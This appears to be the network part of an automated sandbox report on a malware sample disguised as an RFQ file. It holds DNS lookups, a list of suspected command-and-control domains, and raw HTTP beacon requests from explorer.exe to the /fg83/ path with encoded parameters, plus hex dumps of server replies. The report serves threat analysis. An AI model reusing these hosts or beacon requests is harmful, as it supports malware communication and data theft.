                                                                                                                                                                                Aug 23, 2023 09:35:30.573162079 CEST1.1.1.1192.168.11.200x82ddNo error (0)www.sfaiqhwxebvtre.net150.95.255.38A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:35:51.260600090 CEST1.1.1.1192.168.11.200xcb04No error (0)www.rtuakl.xyz203.161.56.237A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:36:12.289516926 CEST1.1.1.1192.168.11.200xc654No error (0)www.r5fesgy.com18.225.33.210A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:36:32.731327057 CEST1.1.1.1192.168.11.200x7023No error (0)www.lido.systems92.205.50.73A (IP address)IN (0x0001)false
                                                                                                                                                                                Aug 23, 2023 09:36:52.923471928 CEST1.1.1.1192.168.11.200x43faNo error (0)www.ngbjf.cyou91.195.240.123A (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • drive.google.com
                                                                                                                                                                                • doc-14-bk-docs.googleusercontent.com
                                                                                                                                                                                • www.aitechscope.com
                                                                                                                                                                                • www.telefonino.shop
                                                                                                                                                                                • www.zentrimax.com
                                                                                                                                                                                • www.luckymotherclucker.com
                                                                                                                                                                                • www.nrodwukb.click
                                                                                                                                                                                • www.ballbucketssalesstore.com
                                                                                                                                                                                • www.pingpongtable-sg.bond
                                                                                                                                                                                • www.shebyoaksmovie.com
                                                                                                                                                                                • www.mtotem.online
                                                                                                                                                                                • www.ddh979.com
                                                                                                                                                                                • www.sfaiqhwxebvtre.net
                                                                                                                                                                                • www.rtuakl.xyz
                                                                                                                                                                                • www.r5fesgy.com
                                                                                                                                                                                • www.lido.systems
                                                                                                                                                                                • www.ngbjf.cyou

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.11.2049921142.250.185.110443C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.11.2049922172.217.18.97443C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                10192.168.11.204994231.31.198.6180C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:34:09.129230976 CEST360OUTGET /fg83/?IpZXsVy=2RBP+VTnP5UsVlIy/ct1u57VujAPMLUq2SsmZdBI0t1ol65Yzj5vyA1Q7mc2+tYrW7QO&kxopsN=MlyXbd0X HTTP/1.1
                                                                                                                                                                                Host: www.mtotem.online
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:34:09.197539091 CEST361INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:34:09 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                Data Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 32 35 33 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 40 6b 65 79 66 72 61 6d 65 73 20 6d 6f 76 65 43 6c 6f 75 64 73 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 76 77 20 33 35 25 7d 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 30 35 76 77 20 33 35 25 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6d 6f 76 65 43 69 74 79 43 6c 6f 75 64 73 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 76 77 20 33 35 25 2c 62 6f 74 74 6f 6d 2c 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 20 33 33 76 68 7d 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 30 35 76 77 20 33 35 25 2c 62 6f 74 74 6f 6d 2c 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 20 33 33 76 68 7d 7d 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 36 30 70 78 20 30 20 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 31 32 70 78 20 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 33 36 34 33 36 34 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 7d 2e 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 62 2d 70 61 67 65 5f 74 79 70 65 5f 65 72 72 6f 72 2d 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 6d 65 6e 75 2d 61 64 64 69 74 69 6f 6e 5f 61 64 64 65 64 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 6d 65 6e 75 2d 61 64 64 69 74 69 6f 6e 5f 61 64 64 65 64 2d 61 63 74 69 76 65 7b 70 61 64 64
                                                                                                                                                                                Data Ascii: feb2<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server253.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">@keyframes moveClouds{0%{background-position:100vw 35%}to{background-position:-105vw 35%}}@keyframes moveCityClouds{0%{background-position:100vw 35%,bottom,center bottom 33vh}to{background-position:-105vw 35%,bottom,center bottom 33vh}}.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:60px 0 0;margin:0;font:12px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;background:#fff;color:#364364;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_parking{min-height:100vh}.b-page_type_error-page{padding:0}html:not(.is_adaptive) .b-page_menu-addition_added,html:not(.is_adaptive) .b-page_menu-addition_added-active{padd
                                                                                                                                                                                Aug 23, 2023 09:34:09.197659969 CEST362INData Raw: 69 6e 67 2d 74 6f 70 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 6d 65 6e 75 2d 61 64 64 69 74 69 6f 6e 5f 61 64 64 65 64 7b 70 61 64 64 69
                                                                                                                                                                                Data Ascii: ing-top:0}@media (min-width:1024px){.is_adaptive .b-page_menu-addition_added{padding-top:0}}.b-page_menu-addition_added-active{padding-top:120px}@media (min-width:1024px){.is_adaptive .b-page_menu-addition_added-active{padding-top:0}}html:not(
                                                                                                                                                                                Aug 23, 2023 09:34:09.197743893 CEST364INData Raw: 70 70 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 34 70 78 3b 70 61 64 64 69 6e
                                                                                                                                                                                Data Ascii: pper{margin:0 auto}.b-page__content-wrapper_style_indent{padding-right:24px;padding-left:24px}.b-page__content-wrapper_style_indent_new{padding-right:48px;padding-left:48px}html:not(.is_adaptive) .b-page__content-wrapper{width:996px}html:not(.
                                                                                                                                                                                Aug 23, 2023 09:34:09.197818995 CEST365INData Raw: 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 74 69 74 6c 65 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 74 69 74
                                                                                                                                                                                Data Ascii: .b-page__addition-title-link:hover{text-decoration:underline}.b-page__addition-title .b-title{display:inline}.b-page__addition-item{position:relative;float:right;padding-right:15px;padding-left:15px}.b-page__addition-item_padding_double{paddin
                                                                                                                                                                                Aug 23, 2023 09:34:09.197884083 CEST366INData Raw: 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 34 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 2d 63 6f 6d 70 61 63 74 2e 62
                                                                                                                                                                                Data Ascii: Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.b-text_size_giant-compact.b-text_margin_top,.b-text_size_giant.b-text_margin_top{margin-top:84px}.b-text_size_giant-compact{font:72px/78px Arial,Helvetica Neue,Helvetica,FreeSans,sans-seri
                                                                                                                                                                                Aug 23, 2023 09:34:09.197953939 CEST368INData Raw: 2d 62 6f 74 74 6f 6d 3a 33 30 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2e 62 2d 74
                                                                                                                                                                                Data Ascii: -bottom:30px}.b-text_size_medium-compact.b-text_margin_top,.b-text_size_medium.b-text_margin_top{margin-top:30px}.b-text_size_medium-compact{font:20px/24px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:30px}.b-text_size_norm
                                                                                                                                                                                Aug 23, 2023 09:34:09.198050976 CEST369INData Raw: 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 34 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67
                                                                                                                                                                                Data Ascii: ica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_huge\@desktop{font:48px/60px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}html:not(.is_adaptive) .b-text_size_huge-compact\@desktop.b-text_
                                                                                                                                                                                Aug 23, 2023 09:34:09.198151112 CEST370INData Raw: 20 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 36 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69
                                                                                                                                                                                Data Ascii: Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}html:not(.is_adaptive) .b-text_size_medium\@desktop{font:20px/30px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:30px}html:not(.is_adaptive) .b-text_size
                                                                                                                                                                                Aug 23, 2023 09:34:09.198215961 CEST372INData Raw: 2d 74 65 78 74 5f 73 69 7a 65 5f 73 6d 61 6c 6c 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 31 32 70 78 2f 31 32 70 78 20 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72
                                                                                                                                                                                Data Ascii: -text_size_small-compact\@desktop{font:12px/12px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:18px}html:not(.is_adaptive) .b-text_margin_none\@desktop{margin:0}@media (min-width:1024px){.is_adaptive .b-text_size_giant\@desk
                                                                                                                                                                                Aug 23, 2023 09:34:09.198273897 CEST373INData Raw: 78 74 5f 73 69 7a 65 5f 62 69 67 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 33 32 70 78 2f 33 36 70 78 20 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e
                                                                                                                                                                                Data Ascii: xt_size_big-compact\@desktop{font:32px/36px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:42px}.is_adaptive .b-text_size_large\@desktop{font:24px/36px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.is
                                                                                                                                                                                Aug 23, 2023 09:34:09.251730919 CEST374INData Raw: 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 73 6d 61 6c 6c 5c 40 64 65 73 6b 74 6f 70
                                                                                                                                                                                Data Ascii: ca,FreeSans,sans-serif;margin-bottom:24px}.is_adaptive .b-text_size_small\@desktop{font:12px/18px Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:18px}.is_adaptive .b-text_size_small-compact\@desktop.b-text_margin_top,.is_adap


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                11192.168.11.2049943154.205.111.16380C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:34:50.183717966 CEST536OUTGET /fg83/?IpZXsVy=DQc+x29LPs0StMrMYSOxbo606Q5N7aX/d2tywja8NeaCrvmLZ/vuxhKObAknVg63SjuP&kxopsN=MlyXbd0X HTTP/1.1
                                                                                                                                                                                Host: www.ddh979.com
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:34:50.355051994 CEST538INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:34:01 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 1788
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d1 ef d6 d0 d4 c8 c7 b8 ce ef c1 aa cd f8 bf c6 bc bc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 37 45 46 43 3b 26 23 78 35 34 30 38 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 38 38 38 26 23 78 38 37 31 43 3b 26 23 78 38 32 42 44 3b 5f 26 23 78 35 36 46 44 3b 26 23 78 34 45 41 37 3b 26 23 78 34 45 39 41 3b 26 23 78 36 44 33 32 3b 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 38 39 43 32 3b 26 23 78 37 37 30 42 3b 39 31 26 23 78 35 37 32 38 3b 26 23 78 37 45 42 46 3b 26 23 78 38 37 34 43 3b 26 23 78 38 36 41 41 3b 26 23 78 37 41 39 44 3b 5f 39 37 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 37 45 46 43 3b 26 23 78 35 34 30 38 3b 26 23 78 35 33 33 41 3b 26 23 78 35 43 30 46 3b 26 23 78 38 42 46 34 3b 26 23 78 35 33 33 41 3b 26 23 78 35 36 46 45 3b 26 23 78 37 32 34 37 3b 26 23 78 35 33 33 41 3b 5f 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 35 36 46 44 3b 26 23 78 34 45 41 37 3b 26 23 78 34 45 39 41 3b 26 23 78 36 44 33 32 3b 41 56 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 37 45 46 43 3b 26 23 78 35 34 30 38 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 38 38 38 26 23 78 38 37 31 43 3b 26 23 78 38 32 42 44 3b 5f 26 23 78 35 36 46 44 3b 26 23 78 34 45 41 37 3b 26 23 78 34 45 39 41 3b 26 23 78 36 44 33 32 3b 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 38 39 43 32 3b 26 23 78 37 37 30 42 3b 39 31 26 23 78 35 37 32 38 3b 26 23 78 37 45 42 46 3b 26 23 78 38 37 34 43 3b 26 23 78 38 36 41 41 3b 26 23 78 37 41 39 44 3b 5f 39 37 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 37 45 46 43 3b 26 23 78 35 34 30 38 3b 26 23 78 35 33 33 41 3b 26 23 78 35 43 30 46 3b 26 23 78 38 42 46 34 3b 26 23 78 35 33 33 41 3b 26 23 78 35 36 46 45 3b 26 23 78 37 32 34 37 3b 26 23 78 35 33 33 41 3b 5f 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 35 36 46 44 3b 26 23 78 34 45 41 37 3b 26 23 78 34 45 39 41 3b 26 23 78 36 44 33 32 3b 41 56 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 37 45 46 43 3b 26 23 78 35 34 30 38 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 38 38 38 26 23 78 38 37 31 43 3b 26 23 78 38 32 42 44 3b 5f 26 23 78 35 36 46 44 3b 26 23 78 34 45 41 37 3b 26 23 78 34 45 39 41 3b 26 23 78 36 44 33 32 3b 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 38 39 43 32 3b 26 23 78 37 37 30 42 3b 39 31 26 23 78 35 37 32 38 3b 26 23 78 37 45 42 46 3b 26 23 78 38 37 34 43 3b 26 23 78 38 36 41 41 3b 26 23 78 37 41 39 44 3b 5f 39 37 26 23 78 34 45 34 35 3b 26 23 78 34 45 34 35 3b 26 23 78 37 45 46 43 3b 26 23 78 35 34 30 38 3b 26 23 78 35 33 33 41 3b 26
                                                                                                                                                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#x7CBE;&#x54C1;&#x7EFC;&#x5408;&#x4E45;&#x4E45;&#x4E45;&#x4E45;&#x4E45;888&#x871C;&#x82BD;_&#x56FD;&#x4EA7;&#x4E9A;&#x6D32;&#x7CBE;&#x54C1;&#x89C2;&#x770B;91&#x5728;&#x7EBF;&#x874C;&#x86AA;&#x7A9D;_97&#x4E45;&#x4E45;&#x7EFC;&#x5408;&#x533A;&#x5C0F;&#x8BF4;&#x533A;&#x56FE;&#x7247;&#x533A;_&#x7CBE;&#x54C1;&#x56FD;&#x4EA7;&#x4E9A;&#x6D32;AV</title><meta name="keywords" content="&#x7CBE;&#x54C1;&#x7EFC;&#x5408;&#x4E45;&#x4E45;&#x4E45;&#x4E45;&#x4E45;888&#x871C;&#x82BD;_&#x56FD;&#x4EA7;&#x4E9A;&#x6D32;&#x7CBE;&#x54C1;&#x89C2;&#x770B;91&#x5728;&#x7EBF;&#x874C;&#x86AA;&#x7A9D;_97&#x4E45;&#x4E45;&#x7EFC;&#x5408;&#x533A;&#x5C0F;&#x8BF4;&#x533A;&#x56FE;&#x7247;&#x533A;_&#x7CBE;&#x54C1;&#x56FD;&#x4EA7;&#x4E9A;&#x6D32;AV" /><meta name="description" content="&#x7CBE;&#x54C1;&#x7EFC;&#x5408;&#x4E45;&#x4E45;&#x4E45;&#x4E45;&#x4E45;888&#x871C;&#x82BD;_&#x56FD;&#x4EA7;&#x4E9A;&#x6D32;&#x7CBE;&#x54C1;&#x89C2;&#x770B;91&#x5728;&#x7EBF;&#x874C;&#x86AA;&#x7A9D;_97&#x4E45;&#x4E45;&#x7EFC;&#x5408;&#x533A;&
                                                                                                                                                                                Aug 23, 2023 09:34:50.355128050 CEST538INData Raw: 23 78 35 43 30 46 3b 26 23 78 38 42 46 34 3b 26 23 78 35 33 33 41 3b 26 23 78 35 36 46 45 3b 26 23 78 37 32 34 37 3b 26 23 78 35 33 33 41 3b 5f 26 23 78 37 43 42 45 3b 26 23 78 35 34 43 31 3b 26 23 78 35 36 46 44 3b 26 23 78 34 45 41 37 3b 26 23
                                                                                                                                                                                Data Ascii: #x5C0F;&#x8BF4;&#x533A;&#x56FE;&#x7247;&#x533A;_&#x7CBE;&#x54C1;&#x56FD;&#x4EA7;&#x4E9A;&#x6D32;AV_&#x65E0;&#x7801;&#x56FD;&#x4EA7;&#x4F26;&#x7CBE;&#x54C1;&#x4E00;&#x533A;&#x4E8C;&#x533A;&#x4E09;_&#x7CBE;&#x54C1;&#x4E9A;&#x6D32;&#x6B27;&#x7F8E


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                12192.168.11.2049944150.95.255.3880C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:35:30.833388090 CEST539OUTGET /fg83/?IpZXsVy=93iuEoE3ZAJchREJoff4c3+cnuBG7egDZRy7rY1Y8CjSiruBWemx2Azc3Gt8OJFb+t3B&1b_Pr=C88x5r HTTP/1.1
                                                                                                                                                                                Host: www.sfaiqhwxebvtre.net
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:35:31.092535973 CEST540INHTTP/1.1 302 Found
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:35:30 GMT
                                                                                                                                                                                Server: Apache
                                                                                                                                                                                Location: http://dfltweb1.onamae.com
                                                                                                                                                                                Content-Length: 210
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                13192.168.11.2049945203.161.56.23780C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Aug 23, 2023 09:35:51.426848888 CEST541OUTGET /fg83/?1b_Pr=C88x5r&IpZXsVy=NXNQizsPdhk7hM3DdL+UWbtauAqc3n1MPcjBQKiLiZ9eGnsQShpdzroL71dVCx/hnsce HTTP/1.1
                                                                                                                                                                                Host: www.rtuakl.xyz
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Aug 23, 2023 09:35:51.661720991 CEST541INHTTP/1.1 404 Not Found
                                                                                                                                                                                Date: Wed, 23 Aug 2023 07:35:51 GMT
                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                Content-Length: 276
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
